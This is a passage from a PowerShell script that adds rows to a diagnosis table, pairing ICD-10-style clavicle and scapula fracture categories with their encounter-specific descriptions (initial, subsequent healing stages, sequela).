nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of right clavicle","Fracture of unspecified part of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of left clavicle","Fracture of unspecified part of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of unspecified clavicle","Fracture of unspecified part of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of right clavicle","Anterior displaced fracture of sternal end of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of left clavicle","Anterior displaced fracture of sternal end of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Anterior displaced fracture of sternal end of unspecified clavicle","Anterior displaced fracture of sternal end of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of right clavicle","Posterior displaced fracture of sternal end of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of left clavicle","Posterior displaced fracture of sternal end of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Posterior displaced fracture of sternal end of unspecified clavicle","Posterior displaced fracture of sternal end of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of right clavicle","Nondisplaced fracture of sternal end of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of left clavicle","Nondisplaced fracture of sternal end of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of sternal end of unspecified clavicle","Nondisplaced fracture of sternal end of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of right clavicle","Displaced fracture of shaft of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of left clavicle","Displaced fracture of shaft of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of shaft of unspecified clavicle","Displaced fracture of shaft of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of right clavicle","Nondisplaced fracture of shaft of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of left clavicle","Nondisplaced fracture of shaft of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified clavicle","Nondisplaced fracture of shaft of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of right clavicle","Displaced fracture of lateral end of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of left clavicle","Displaced fracture of lateral end of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral end of unspecified clavicle","Displaced fracture of lateral end of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of right clavicle","Nondisplaced fracture of lateral end of right clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of left clavicle","Nondisplaced fracture of lateral end of left clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral end of unspecified clavicle","Nondisplaced fracture of lateral end of unspecified clavicle, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, right shoulder","Fracture of unspecified part of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, left shoulder","Fracture of unspecified part of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified part of scapula, unspecified shoulder","Fracture of unspecified part of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, right shoulder","Displaced fracture of body of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with 